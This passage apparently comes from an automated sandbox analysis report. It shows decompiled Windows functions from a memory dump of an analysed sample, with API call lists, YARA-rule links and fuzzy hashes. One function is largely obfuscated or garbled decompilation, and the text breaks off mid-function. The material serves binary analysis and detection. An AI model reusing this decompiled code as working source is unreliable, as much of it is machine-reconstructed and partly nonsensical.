Function 0040A9EE, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040A9EE(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x4238a0 & 0x00000004) == 0 || E004132A1() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x423e84);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E0040C1FE( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x0040a9f9
0x0040a9fd
0x0040aa6e
0x00000000
0x0040aa08
0x0040aa14
0x0040aa18
0x00000000
0x0040aa1f
0x0040aa23
0x0040aa27
0x0040aa2f
0x0040aa2f
0x0040aa38
0x0040aa3e
0x0040aa4e
0x0040aa56
0x0040aa5d
0x0040aa60
0x0040aa66
0x0040aa6a
0x00000000
0x0040aa6a
0x0040aa18

APIs

GetUpdateRect.USER32 ref: 0040AA75

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

TlsGetValue.KERNEL32 ref: 0040AA0E
SaveDC.GDI32(?), ref: 0040AA3E
SendMessageW.USER32(?,00000014,?,00000000), ref: 0040AA4E
RestoreDC.GDI32(?,00000000), ref: 0040AA60

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 8fab9b95da80baab7f9f06c0aa03e46981ba78558653aa70dceb5e34783af577
Instruction ID: dd28e4c5e9874d695e7c1081c3b79c7c16e617d8acf354410a58c8117f3bc64a
Opcode Fuzzy Hash: 8fab9b95da80baab7f9f06c0aa03e46981ba78558653aa70dceb5e34783af577
Instruction Fuzzy Hash: 12119A31200344ABCB319F70DE48FAB7BA8AB04315F04883AF996A25F1C3389550CF29

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABE3, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040ABE3() {
				struct tagMSG _v32;
				signed int _t12;
				char _t17;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x423e8c);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x423e88 && _v32.wParam == 0xfffffffc) {
						_t17 = E0040A496( *0x423e90 + 0x114, _t19, _t21, 0x423e80, _v32.lParam, 1);
						_t19 =  *0x423e90;
						 *((char*)( *0x423e90 + 0x124)) = _t17;
						SetEvent( *0x423e8c);
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x0040abf7
0x0040ac09
0x0040ac58
0x0040ac63
0x0040ac68
0x00000000
0x00000000
0x0040ac15
0x00000000
0x00000000
0x0040ac21
0x0040ac3f
0x0040ac44
0x0040ac4a
0x0040ac56
0x0040ac56
0x0040ac21
0x0040ac76

APIs

GetCurrentThread.KERNEL32 ref: 0040ABF0
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00413D65), ref: 0040ABF7
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00413D65), ref: 0040AC09
SetEvent.KERNEL32(00423E80,?,00000001), ref: 0040AC56
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0040AC63

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: d3d8f16731c275643d1477cb908263aec5f2c5ecb2b4e831de75395752d70c01
Instruction ID: ca80f19ddb359120c232e7af1eb8342aa168f542fbea1137669a9aa91f358d40
Opcode Fuzzy Hash: d3d8f16731c275643d1477cb908263aec5f2c5ecb2b4e831de75395752d70c01
Instruction Fuzzy Hash: 1401D2316043006BDB20EB74ED09B5A77B49B85334F56073AF520A21F0C779D96ACB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00407D89, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,0002075A,004081C2,00000000), ref: 00407D8F
ReleaseMutex.KERNEL32(?), ref: 00407DC3
IsWindow.USER32(?), ref: 00407DCA
PostMessageW.USER32(?,00000215,00000000,?), ref: 00407DE4
SendMessageW.USER32(?,00000215,00000000,?), ref: 00407DEC

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
Instruction ID: 06e7c1503072b329be2a24b48e7d77bd3e331f23a6dc97bf78322ca8c30e116d
Opcode Fuzzy Hash: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
Instruction Fuzzy Hash: ABF0B6745083019BC3219F24DD48DAABBB5FF89711B044A7DF496A33B1C774A844DB26

Uniqueness

Uniqueness Score: -1.00%

Function 00407D89, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004081C2,00000000), ref: 00407D8F
ReleaseMutex.KERNEL32(?), ref: 00407DC3
IsWindow.USER32(?), ref: 00407DCA
PostMessageW.USER32(?,00000215,00000000,?), ref: 00407DE4
SendMessageW.USER32(?,00000215,00000000,?), ref: 00407DEC

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
Instruction ID: 06e7c1503072b329be2a24b48e7d77bd3e331f23a6dc97bf78322ca8c30e116d
Opcode Fuzzy Hash: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
Instruction Fuzzy Hash: ABF0B6745083019BC3219F24DD48DAABBB5FF89711B044A7DF496A33B1C774A844DB26

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1F7, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040B1F7(void* __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi, void* __esi) {
				intOrPtr _t73;
				intOrPtr _t74;
				int _t76;
				void* _t78;
				intOrPtr* _t81;
				signed char _t82;
				void* _t85;
				void* _t87;

				_t85 = __esi;
				_t82 = __edx;
				_t78 = __ebx;
				_push(__eax);
				while(1) {
					L10:
					asm("movsb");
					asm("popfd");
					_push(__edx);
					asm("loope 0xffffffd9");
					while(1) {
						asm("lock cmp eax, 0xd1712469");
						 *(__edx + 0x7c) =  *(__edx + 0x7c) | __dl;
						asm("clc");
						__eflags =  *__ecx & __esp;
						asm("psubb mm1, [ebp-0x6a48c8df]");
						 *__eax =  *__eax & __edi;
						__eflags =  *__eax;
						if(__eflags >= 0) {
							L18:
							asm("sbb edx, eax");
							 *(__ebx + 0x2f03b555) = __ch;
						} else {
							asm("adc [edi-0x53fa6e9d], ch");
							 *__esi = __ebp;
							if(__eflags >= 0) {
								__bh = __bh &  *__ecx;
								asm("cmpsd");
								__edx = __edx - 1;
								__eflags = __edx;
								if(__edx >= 0) {
									goto L10;
								} else {
									asm("fldenv [ss:edi]");
									_pop(__esp);
									 *__ebx =  *__ebx | 0x2f05d325;
									__eflags =  *__ebx;
									L17:
									asm("das");
									 *(__edx - 0x6e998843) =  *(__edx - 0x6e998843) & __eax;
									__eax =  &(__eax[0xfffffffffd168764]);
									__ch = __ch << 1;
									asm("adc [edx], ecx");
									asm("stosd");
									__eax = __eax - 0x1b2f05d3;
									__eflags = __eax;
									goto L18;
								}
							}
						}
						__ch = 3;
						asm("das");
						if(__eflags >= 0) {
							while(1) {
								L5:
								 *(_t74 + 0x57) =  *(_t74 + 0x57) | _t82;
								E0040B07E(_t81, _t85);
								while(1) {
									_t78 = _t78 + 1;
									_t85 = _t85 + 0xc;
									if(_t78 >=  *((intOrPtr*)(_t87 - 8))) {
										break;
									}
									_t81 = _t85 +  *((intOrPtr*)(_t87 - 0xc));
									_t73 =  *((intOrPtr*)(_t81 + 8));
									if(_t73 == 0 || _t73 == 4) {
										_t74 =  *_t81;
										if(_t74 !=  *((intOrPtr*)(_t87 - 0x14))) {
											_push( *((intOrPtr*)(_t87 + 0xc)));
											_push( *((intOrPtr*)(_t87 + 8)));
											goto L5;
										}
									}
								}
								 *((intOrPtr*)(_t87 - 0x10))( *((intOrPtr*)(_t87 - 0xc)));
								_t76 = FreeLibrary( *(_t87 - 4));
								return _t76;
								goto L90;
							}
						} else {
							_push(__esi);
							asm("sbb al, 0xb1");
							__eflags =  *((intOrPtr*)(__eax - 0x2d)) - __esp;
							gs =  *__esi;
							__edi = __edi - 0x2d47557e;
							__eflags = __edi;
							if(__edi >= 0) {
								goto L17;
							} else {
								 *(__ebx + 0x55) = 3;
								asm("std");
								_push(__ebp);
								while(1) {
									 *__edx = 0xf52f0585;
									asm("adc [edx], ecx");
									asm("stosd");
									__ecx = __ecx + 1;
									__eflags = __ecx;
									asm("rol dword [0x437ce2f], cl");
									asm("das");
									if(__ecx >= 0) {
										break;
									}
									_push(__ebx);
									 *0x7f75f535 = __al;
									asm("cdq");
									__cl = __cl &  *__edx;
									__eflags = __cl;
									asm("das");
									if(__eflags >= 0) {
										L31:
										asm("adc eax, 0x11bb712f");
										 *0x2961cdfd = __al;
										if(__eflags >= 0) {
											asm("cmpsb");
											__eax = __eax | 0x3dc76df5;
											asm("retf");
											__eax =  &(__eax[0x2c6fe17]);
											__eax = __eax - 0xa253c51b;
											asm("std");
											asm("int 0x5d");
											__eax = __eax - 0x9b88d171;
											_push(__ebp);
											asm("das");
											__al = __al + 0x2f;
											__eflags = __al;
											asm("das");
											if(__eflags >= 0) {
												if(__eflags >= 0) {
													goto L34;
												} else {
													__eax =  &(__eax[0x16fa9ad3]);
													asm("sbb eax, 0xb815caa");
													__ebp = __ebp - __edx;
													__eax =  &(__eax[0x3dd9097]);
													__eflags = __eax;
													asm("lahf");
													if(__eax < 0) {
														__eflags = __al;
														if(__eflags >= 0) {
															goto L48;
														} else {
															__dl = 0xf7;
															while(1) {
																L51:
																 *__ebx =  ~( *__ebx);
																while(1) {
																	asm("sbb edx, eax");
																	gs = __ecx;
																	__al = 0x32;
																	asm("adc eax, 0x5f0e3c7");
																	asm("das");
																	if(__eflags <= 0) {
																		goto L63;
																	}
																	L53:
																	asm("lds esp, [edx+esi*4]");
																	_pop(__eax);
																	 *__ebx =  *__ebx | 0x2f05d337;
																	__eflags =  *__ebx;
																	L54:
																	__esi = __esi |  *__edi;
																	__eflags = __esi;
																	asm("rol dword [0x8ed01b2f], cl");
																	goto 0x2f656062;
																	if(__eflags >= 0) {
																		asm("sbb edx, eax");
																		gs = __ecx;
																		__al = 0x32;
																		asm("adc eax, 0x5f0e3c7");
																		asm("das");
																		if(__eflags <= 0) {
																			goto L63;
																		}
																	} else {
																		__dl = 0xf7;
																		asm("sbb edx, eax");
																		gs = __ecx;
																		__al = 0x32;
																		asm("adc eax, 0x5f01fc7");
																		asm("das");
																		if(__eflags <= 0) {
																			L68:
																			if(__eflags >= 0) {
																				goto L61;
																			} else {
																				__edi = __edi - 0x6388f405;
																				__eflags = __edi;
																				L70:
																				asm("arpl [ebp-0x3b], dx");
																				asm("in eax, dx");
																				L71:
																				asm("std");
																				if(__eflags > 0) {
																					L64:
																					asm("stosd");
																					_push(__ebp);
																					__eflags =  *__edi & __eax;
																					asm("das");
																					if(__eflags >= 0) {
																						goto L51;
																					} else {
																						 *(__ebx + 0x55) = __ch;
																						__eax =  *0x2ae0c755;
																						asm("cli");
																						L66:
																						__ch = __ch << 1;
																						asm("adc [ecx+0x70], esi");
																						asm("cld");
																						_t56 = __eax;
																						__eax = __ebp;
																						__ebp = _t56;
																						 *__ebx =  *__ebx & __edi;
																						 *__esi =  *__esi & __ebp;
																						__eflags =  *__esi;
																						if(__eflags >= 0) {
																							goto L70;
																						} else {
																							__edi =  *__ecx * 0xd1714c44;
																							__eflags = __edi;
																							goto L68;
																						}
																					}
																				} else {
																					__eax =  &(__eax[0xffffffffc0ae40d2]);
																					__eflags = __eax;
																				}
																			}
																		} else {
																			asm("lds esp, [edx+esi*4]");
																			_pop(__eax);
																			 *__ebx =  *__ebx | 0x2f05d33b;
																			asm("cld");
																			_push(__ebp);
																			_t41 = __edi + 0x79;
																			 *_t41 =  *(__edi + 0x79) & __eax;
																			__eflags =  *_t41;
																			L58:
																			__edi = __edi + 1;
																			__eflags = __edi;
																			if(__edi >= 0) {
																				goto L54;
																			} else {
																				__eax =  &(__eax[0x2a8ac63]);
																				asm("das");
																				asm("sbb ebx, edx");
																				__al = __al + 0x2f;
																				__eflags = __al;
																				if(__al < 0) {
																					 *__ebx =  *__ebx | 0x2f05d81e;
																					 *(__ecx + 0xb + __eax * 4) =  *(__ecx + 0xb + __eax * 4) & __ebx;
																					asm("adc ebp, edx");
																					__eax =  &(__eax[0xfffffffffb1c9098]);
																					__dh = __dh &  *(__ecx - 0x2f);
																					_push(__edx);
																					 *0x7f69f535 = __al;
																					asm("cld");
																					_push(__ebp);
																					_t50 = __edi + 0x75;
																					 *_t50 =  *(__edi + 0x75) & __ecx;
																					__eflags =  *_t50;
																					L61:
																					__edi = __edi - 1;
																					__eflags = __edi;
																					if(__edi != 0) {
																						goto L58;
																					} else {
																						__eax =  &(__eax[0x2f9a863]);
																						asm("das");
																						goto L63;
																					}
																				}
																			}
																		}
																	}
																	 *__ebx =  *__ebx | 0x2f05d321;
																	 *__ecx =  *__ecx & __edi;
																	asm("pushad");
																	__ebp = __ebp - 1;
																	__eflags = __ebp;
																	if(__eflags >= 0) {
																		goto L66;
																	}
																	 *(__ebx + 0x2f03b155) = __ch;
																	while(1) {
																		asm("stosd");
																		_push(__ebp);
																		__cl = 3;
																		asm("das");
																		if(__eflags >= 0) {
																			goto L58;
																		}
																		asm("in eax, dx");
																		if(__eflags <= 0) {
																			asm("rol dword [0x2195fc78], 1");
																			__ebx = __ebx + 1;
																			_t58 = __ecx - 0x2eccebd3;
																			 *_t58 =  *(__ecx - 0x2eccebd3) & __edi;
																			__eflags =  *_t58;
																			asm("in eax, dx");
																			asm("lodsd");
																			if(__eflags < 0) {
																				goto L71;
																			} else {
																				__eax =  &(__eax[0xcfa92d2]);
																				__eflags = __eax;
																			}
																		}
																		__eax = __eax & 0xb9ac19f5;
																		__eflags = __eax;
																		 *[cs:ebx+0x2f078155] = __ah;
																		if(__eflags >= 0) {
																			__al = __al + __ch;
																			 *__eax =  *__eax + __al;
																			_t60 = __ebp - 0x214; // 0x616aeb1a
																			_t60 = E00413447(__ecx, _t60);
																			_t61 = __ebp - 0x198; // 0x616aeb96
																			__eax = _t61;
																			__ecx = 0x423b18;
																			__eax = E0040C233(_t61, 0x423b18, 0x10);
																			__eflags = __eax;
																			if(__eax != 0) {
																				L88:
																				__al = 0;
																				__eflags = 0;
																			} else {
																				__ecx =  *0x4238fc;
																				__eax = E0040CD11( *0x4238fc);
																				__edi = 0x423900;
																				__ecx = 0x423900;
																				 *(__ebp + 8) = __eax;
																				__eax = E0040CD11(0x423900);
																				__ebx = __eax;
																				_t63 = __ebp - 0x2c; // 0x616aed02
																				__esi = _t63;
																				__eax = __eax | 0xffffffff;
																				_t64 = __ebp - 0x86; // 0x616aeca8
																				__ecx = _t64;
																				__eax = E0040C3CD(__eax, _t64, _t63, 0, 0x14);
																				__eflags =  *(__ebp + 8) - __ebx;
																				if( *(__ebp + 8) <= __ebx) {
																					goto L88;
																				} else {
																					__eax =  *0x4238fc;
																					__esi = __ebx + __ebx;
																					__eflags =  *((short*)(__eax + __esi)) - 0x5c;
																					if( *((short*)(__eax + __esi)) != 0x5c) {
																						goto L88;
																					} else {
																						__eax = StrCmpNIW(0x423900, __eax, __ebx);
																						__eflags = __eax;
																						if(__eax != 0) {
																							goto L88;
																						} else {
																							_t69 =  &(( *0x4238fc)[1]); // 0x423902
																							__eax = _t69 + __esi;
																							_t70 = __ebp - 0x2c; // 0x616aed02
																							__eax = _t70;
																							__eax = lstrcmpiW(_t70, _t69 + __esi);
																							__eflags = __eax;
																							if(__eax != 0) {
																								goto L88;
																							} else {
																								__al = 1;
																							}
																						}
																					}
																				}
																			}
																			_pop(__edi);
																			_pop(__esi);
																			_pop(__ebx);
																			__esp = __ebp;
																			_pop(__ebp);
																			return __eax;
																		} else {
																			 *__edi =  *__edi >> 1;
																			if(__eflags >= 0) {
																				continue;
																			} else {
																				return __eax;
																			}
																		}
																		goto L90;
																	}
																	goto L58;
																	L63:
																	asm("sbb edx, ecx");
																	 *(__ebx + 0x2f078555) = __ch;
																	goto L64;
																}
															}
														}
													} else {
														__edi = __eax + __edi;
														__eax[0x33bf1782] = __eax;
														asm("invalid");
														__eax =  &(__eax[0x382392aa]);
														asm("rol byte [0x86d11b2f], 1");
														asm("out 0x8e, eax");
														_pop(__esp);
														 *__ebx = __ecx;
														asm("adc ebp, edx");
														__eax =  &(__eax[0x5054c97]);
														__eflags = __eax;
														asm("das");
														if(__eax >= 0) {
															L47:
															asm("rol dword [eax-0x422fa11], 1");
															__edx =  *(__ebp - 0x3d) * 0x3d;
															__eflags =  *(__ebp - 0x3d) * 0x3d;
															L48:
															_push(__ebp);
															return __eax;
														} else {
															__ecx = __ecx + 1;
															__esp = __esp |  *(__ebx - 0x2f);
															__esp = __esp ^ 0x990af305;
															__eflags = __esp;
															asm("repe or bl, [ecx+0x7917f535]");
															_pop(ss);
															if(__eflags >= 0) {
																goto L35;
															} else {
																asm("movsd");
																 *__ebx =  *__ebx | 0x3d1dc48e;
																__eflags = __ecx;
																goto L47;
															}
														}
													}
												}
											} else {
												asm("int 0xd0");
												asm("cdq");
												ss =  *0x11bb712f;
												goto L31;
											}
										} else {
											asm("outsd");
											asm("das");
											asm("cld");
											 *[gs:0xac05d173] =  *[gs:0xac05d173] & __edi;
											__ecx = 0x616aed2e;
											asm("rol dword [0x5bb7b45], 1");
											L34:
											 *0x2d23f5c5 = __al;
											L35:
											__eax = __eax - 0xe786d171;
											__eflags = __eax;
										}
									} else {
										__ecx = __ecx + 1;
										__ebx = __ebx |  *0xf106ed81;
										__eflags = __ebx;
										asm("rol dword [0xe1f5f5a2], 1");
										asm("das");
										if(__ebx >= 0) {
											continue;
										} else {
											asm("invalid");
											__eflags =  *0x6fd01b2f & __eax;
											es = __ebp;
											asm("cld");
											_t24 = __eax;
											__eax = __ebp;
											__ebp = _t24;
											 *(__edi + 0x21) =  *(__edi + 0x21) & __esp;
											__eflags = __ebp - __edi;
											__esi = __esi |  *(__ecx - 0x2f);
											asm("outsd");
											_pop(es);
											asm("cld");
											_t28 = __eax;
											__eax = __ebp;
											__ebp = _t28;
											 *(__ebx + 0x21) =  *(__ebx + 0x21) & __ebp;
											_pop(__esp);
											 *__ebx =  *__ebx | 0x2f05d18d;
											__eflags =  *__ebx;
											asm("cdq");
											asm("lock das");
											if (__eflags >= 0) goto L38;
											_pop(__edx);
										}
									}
									goto L90;
								}
								asm("lock cmp eax, 0xd1712469");
								goto L12;
							}
						}
						L90:
						L12:
						__al = __al & 0x00000071;
						asm("rcl dword [esi+0x79], 1");
						asm("cli");
					}
				}
			}

0x0040b1f7
0x0040b1f7
0x0040b1f7
0x0040b1f7
0x0040b1f8
0x0040b1f8
0x0040b1f8
0x0040b1f9
0x0040b1fa
0x0040b1fb
0x0040b1fd
0x0040b1fd
0x0040b206
0x0040b209
0x0040b20a
0x0040b20c
0x0040b213
0x0040b213
0x0040b215
0x0040b245
0x0040b245
0x0040b247
0x0040b217
0x0040b217
0x0040b21d
0x0040b21f
0x0040b221
0x0040b223
0x0040b224
0x0040b224
0x0040b225
0x00000000
0x0040b227
0x0040b227
0x0040b22a
0x0040b22b
0x0040b22b
0x0040b230
0x0040b230
0x0040b231
0x0040b237
0x0040b23c
0x0040b23e
0x0040b240
0x0040b241
0x0040b241
0x00000000
0x0040b241
0x0040b225
0x0040b21f
0x0040b24a
0x0040b24c
0x0040b24d
0x0040b1d0
0x0040b1d0
0x0040b1d0
0x0040b1d3
0x0040b1d8
0x0040b1d8
0x0040b1d9
0x0040b1df
0x00000000
0x00000000
0x0040b1b5
0x0040b1b8
0x0040b1bd
0x0040b1c4
0x0040b1c9
0x0040b1cb
0x0040b1ce
0x00000000
0x0040b1ce
0x0040b1c9
0x0040b1bd
0x0040b1e4
0x0040b1ea
0x0040b1f4
0x00000000
0x0040b1f4
0x0040b24f
0x0040b24f
0x0040b250
0x0040b252
0x0040b255
0x0040b257
0x0040b257
0x0040b25d
0x00000000
0x0040b25f
0x0040b25f
0x0040b262
0x0040b263
0x0040b264
0x0040b264
0x0040b26a
0x0040b26c
0x0040b26d
0x0040b26d
0x0040b26e
0x0040b274
0x0040b275
0x00000000
0x00000000
0x0040b277
0x0040b278
0x0040b27d
0x0040b27e
0x0040b27e
0x0040b280
0x0040b281
0x0040b2df
0x0040b2df
0x0040b2e4
0x0040b2e9
0x0040b2bc
0x0040b2bd
0x0040b2c2
0x0040b2c3
0x0040b2c8
0x0040b2cd
0x0040b2ce
0x0040b2d0
0x0040b2d5
0x0040b2d6
0x0040b2d7
0x0040b2d7
0x0040b2d8
0x0040b2d9
0x0040b32d
0x00000000
0x0040b32f
0x0040b32f
0x0040b334
0x0040b339
0x0040b33b
0x0040b33b
0x0040b340
0x0040b341
0x0040b3a3
0x0040b3a5
0x00000000
0x0040b3a7
0x0040b3a7
0x0040b3a8
0x0040b3a8
0x0040b3a8
0x0040b3a9
0x0040b3a9
0x0040b3ab
0x0040b3ad
0x0040b3af
0x0040b3b4
0x0040b3b5
0x00000000
0x00000000
0x0040b3b7
0x0040b3b7
0x0040b3ba
0x0040b3bb
0x0040b3bb
0x0040b3bc
0x0040b3bc
0x0040b3bc
0x0040b3be
0x0040b3c4
0x0040b3c9
0x0040b3a9
0x0040b3ab
0x0040b3ad
0x0040b3af
0x0040b3b4
0x0040b3b5
0x00000000
0x00000000
0x0040b3cb
0x0040b3cb
0x0040b3cd
0x0040b3cf
0x0040b3d1
0x0040b3d3
0x0040b3d8
0x0040b3d9
0x0040b441
0x0040b441
0x00000000
0x0040b443
0x0040b443
0x0040b443
0x0040b448
0x0040b448
0x0040b44b
0x0040b44c
0x0040b44c
0x0040b44d
0x0040b420
0x0040b420
0x0040b421
0x0040b422
0x0040b424
0x0040b425
0x00000000
0x0040b427
0x0040b427
0x0040b42a
0x0040b42f
0x0040b430
0x0040b430
0x0040b432
0x0040b435
0x0040b436
0x0040b436
0x0040b436
0x0040b437
0x0040b439
0x0040b439
0x0040b43b
0x00000000
0x0040b43d
0x0040b43d
0x0040b43d
0x00000000
0x0040b43d
0x0040b43b
0x0040b44f
0x0040b44f
0x0040b44f
0x0040b44f
0x0040b44d
0x0040b3db
0x0040b3db
0x0040b3de
0x0040b3df
0x0040b3e5
0x0040b3e6
0x0040b3e7
0x0040b3e7
0x0040b3e7
0x0040b3e8
0x0040b3e8
0x0040b3e8
0x0040b3e9
0x00000000
0x0040b3eb
0x0040b3eb
0x0040b3f0
0x0040b3f1
0x0040b3f3
0x0040b3f3
0x0040b3f5
0x0040b3f7
0x0040b3fd
0x0040b401
0x0040b403
0x0040b408
0x0040b40b
0x0040b40c
0x0040b411
0x0040b412
0x0040b413
0x0040b413
0x0040b413
0x0040b414
0x0040b414
0x0040b414
0x0040b415
0x00000000
0x0040b417
0x0040b417
0x0040b41c
0x00000000
0x0040b41c
0x0040b415
0x0040b3f5
0x0040b3e9
0x0040b3d9
0x0040b453
0x0040b459
0x0040b45b
0x0040b45c
0x0040b45c
0x0040b45d
0x00000000
0x00000000
0x0040b45f
0x0040b460
0x0040b460
0x0040b461
0x0040b462
0x0040b464
0x0040b465
0x00000000
0x00000000
0x0040b467
0x0040b468
0x0040b46a
0x0040b470
0x0040b471
0x0040b471
0x0040b471
0x0040b477
0x0040b478
0x0040b479
0x00000000
0x0040b47b
0x0040b47b
0x0040b47b
0x0040b47b
0x0040b479
0x0040b47d
0x0040b47d
0x0040b482
0x0040b489
0x0040b4c4
0x0040b4c8
0x0040b4ca
0x0040b4d1
0x0040b4d8
0x0040b4d8
0x0040b4de
0x0040b4e3
0x0040b4e8
0x0040b4ea
0x0040b55a
0x0040b55a
0x0040b55a
0x0040b4ec
0x0040b4ec
0x0040b4f2
0x0040b4f7
0x0040b4fc
0x0040b4fe
0x0040b501
0x0040b508
0x0040b50c
0x0040b50c
0x0040b50f
0x0040b512
0x0040b512
0x0040b518
0x0040b51d
0x0040b520
0x00000000
0x0040b522
0x0040b522
0x0040b527
0x0040b52a
0x0040b52f
0x00000000
0x0040b531
0x0040b534
0x0040b53a
0x0040b53c
0x00000000
0x0040b53e
0x0040b543
0x0040b543
0x0040b548
0x0040b548
0x0040b54c
0x0040b552
0x0040b554
0x00000000
0x0040b556
0x0040b556
0x0040b556
0x0040b554
0x0040b53c
0x0040b52f
0x0040b520
0x0040b55c
0x0040b55d
0x0040b55e
0x0040b55f
0x0040b55f
0x0040b560
0x0040b48b
0x0040b48b
0x0040b48d
0x00000000
0x0040b48f
0x0040b48f
0x0040b48f
0x0040b48d
0x00000000
0x0040b489
0x00000000
0x0040b41d
0x0040b41d
0x0040b41f
0x00000000
0x0040b41f
0x0040b3a9
0x0040b3a8
0x0040b343
0x0040b343
0x0040b345
0x0040b34b
0x0040b34d
0x0040b352
0x0040b358
0x0040b35a
0x0040b35b
0x0040b35d
0x0040b35f
0x0040b35f
0x0040b364
0x0040b365
0x0040b37e
0x0040b37e
0x0040b384
0x0040b384
0x0040b385
0x0040b385
0x0040b386
0x0040b367
0x0040b367
0x0040b368
0x0040b36b
0x0040b36b
0x0040b36e
0x0040b373
0x0040b374
0x00000000
0x0040b376
0x0040b376
0x0040b377
0x0040b37d
0x00000000
0x0040b37d
0x0040b374
0x0040b365
0x0040b341
0x0040b2db
0x0040b2db
0x0040b2dd
0x0040b2de
0x00000000
0x0040b2de
0x0040b2eb
0x0040b2eb
0x0040b2ec
0x0040b2ed
0x0040b2ee
0x0040b2f5
0x0040b2fa
0x0040b300
0x0040b300
0x0040b304
0x0040b304
0x0040b304
0x0040b304
0x0040b283
0x0040b283
0x0040b284
0x0040b284
0x0040b28a
0x0040b290
0x0040b291
0x00000000
0x0040b293
0x0040b294
0x0040b296
0x0040b29c
0x0040b29d
0x0040b29e
0x0040b29e
0x0040b29e
0x0040b29f
0x0040b2a2
0x0040b2a4
0x0040b2a7
0x0040b2a8
0x0040b2a9
0x0040b2aa
0x0040b2aa
0x0040b2aa
0x0040b2ab
0x0040b2ae
0x0040b2af
0x0040b2af
0x0040b2b5
0x0040b2b6
0x0040b2b9
0x0040b2ba
0x0040b2ba
0x0040b291
0x00000000
0x0040b281
0x0040b1fd
0x00000000
0x0040b1fd
0x0040b25d
0x00000000
0x0040b200
0x0040b200
0x0040b202
0x0040b205
0x0040b205
0x0040b1fd

Strings

.ja, xrefs: 0040B2F5

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: .ja
API String ID: 0-198210695
Opcode ID: 58ffda41fd4ef63771d01ae4a610163495b8d79403c91559fdd20033f6f43632
Instruction ID: 1a1eb6925cd5e3175a6f5b14556fc2d033f816b99603b7fd899d67576d67dd6f
Opcode Fuzzy Hash: 58ffda41fd4ef63771d01ae4a610163495b8d79403c91559fdd20033f6f43632
Instruction Fuzzy Hash: 36B1AB72900615DBCB21DF68D8869AA7BF4FF6131679440BFD481EB282C3399542CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00410541, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410541(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E0040D547(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
